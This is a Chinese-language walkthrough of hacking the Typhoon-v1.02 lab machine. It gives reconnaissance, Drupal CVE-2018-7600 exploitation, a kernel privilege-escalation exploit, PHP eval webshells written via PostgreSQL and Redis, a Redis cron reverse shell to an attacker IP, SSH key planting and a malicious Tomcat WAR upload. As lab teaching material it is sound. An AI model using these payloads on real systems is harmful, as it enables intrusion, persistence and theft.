一、Nmap进行扫描
nmap 192.168.128.0/24 -sP #对自己的靶机网段进行扫描nmap -T4 -sV -Pn -p- 192.168.128.129 #对目标进行全端口扫描
二、对目标网站进行目录扫描
python3 dirsearch.py -u http://192.168.128.129/ -e扫描发现存在以下目录文件http://192.168.128.129/cms/http://192.168.128.129/phpmyadmin/http://192.168.128.129/drupal/http://192.168.128.129/robots.txt
三、Drupal漏洞利用
通过目录扫描发现平台使用了Drupal框架,使用vulmap工具进行漏洞探测python3 vulmap.py -u http://192.168.128.129/drupal/ -a Drupal
目标存在 CVE-2018-7600代码执行漏洞使用msf对漏洞进行利用
四、提权
获取到shell之后在对机器进行信息搜集/bin/bash -i #可视化shell使用searchsploit工具或者linux-exploit-suggester脚本进行漏洞探测过程如下:https://mp.weixin.qq.com/s/DdUcrwYsILpWH4ibYos5pA使用探测到的漏洞尝试提权
searchsploit工具使用uname -a #查看内核版本searchsploit 3.13.0 #查找内核漏洞searchsploit -m linux/local/37292.c #下载脚本到当前目录上传脚本到靶机执行以下命令:gcc 37292.c -o mcchmod +x mc./mc
五、其他攻击方式
21端口暴力破解 Ftp
ftp 192.168.128.129
22端口暴力破解 SSH
ssh admin@192.168.128.129metallica
sudo -l # 显示当前用户可以用 sudo 执行那些命令sudo -i # 拿到root权限
139 + 445 端口Samba远程代码执行漏洞(CVE-2017-7494)Linux版永恒之蓝
Samba 是在 Linux 和 UNIX 系统上实现 SMB 协议的一个软件,不少 IoT 设备也使用了 Samba。2017年5月24日 Samba 发布了 4.6.4 版本,修复了一个严重的远程代码执行漏洞,漏洞编号 CVE-2017-7494,攻击者可以利用该漏洞在目标服务器上执行任意代码。漏洞利用条件:1.服务端共享目录有访问权限。2.需要对服务器上写一个恶意文件并知道该文件的物理路径。影响版本:Samba 3.5+ <4.6.4 <4.5.10 <4.4.14# 注:没成功
2049端口 NFS
⽹络⽂件系统(NFS)是⼀个客户端/服务器应⽤程序,它使计算机⽤户可以查看和选择存储和更新远程计算机上的⽂件,就像它们位于⽤户⾃⼰的计算机上⼀样。通过端口扫描发现目标机器存在nfs服务尝试nfs漏洞利用showmount -e 192.168.128.129 # 查看NFS服务器上的共享目录# 创建本地挂载⽬录,挂载共享⽬录mkdir -p /tmmount -t nfs 192.168.128.129:/typhoon /tm
2701端口 mongodb未授权访问漏洞
通过探测发现mongodb存在未授权访问漏洞通过连接发现存放了明文的用户和密码,可通过ssh连接
5432 PostgreSQL利用
爆破PostgreSQL数据库用户名密码postgres postgrespsql -h 192.168.128.129 -U postgre# 使用数据库写webshll文件copy (select '<?php @eval($_POST[123]);?>') to '/var/www/html/123.php';蚁剑成功连接
# 第二种写webshell方法drop table mc;create table mc (t TEXT);insert into mc(t) values ('<?php @eval($_POST[123]);?>');select * from mc;copy mc(t) to '/var/www/html/ccc.php';drop table mc;
6379 redis未授权 [未成功]
redis-cli -h 192.168.128.129# 写webshellconfig set dir /var/www/htmlconfig set dbfilename shell.phpset webshell "<?php@eval($_POST('x'));?>"save# 定时计划反弹shellset 0 "nn*/1 * * * * /bin/bash -i>& /dev/tcp/192.168.128.133/4321 0>&1nn"config set dir /var/spool/cron/crontabsconfig set dbfilename rootsave# 写SSH公钥ssh-keygen -t rsa # 本地生成公私钥config set dir "/root/.ssh"config set dbfilename "authorized_keys"set x "n n n id_rsa.pud n n n"save
8080端口 Tomcat Manager
访问8080端口,点击manager webapp 使用默认用户名和密码tomcat登录后台上传恶意的war包拿到shelljar -cvf shell.war shell.jsp使用冰蝎连接http://192.168.128.129:8080/shell/shell.jsp获取shell
lcms漏洞利用
通过目录扫描发现cms目录http://192.168.128.129/cms/平台使用了lcms,尝试通过此cms漏洞获取shell成功获取到shell
原文始发于微信公众号(渗透笔记):Typhoon-v1.02靶机实战复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论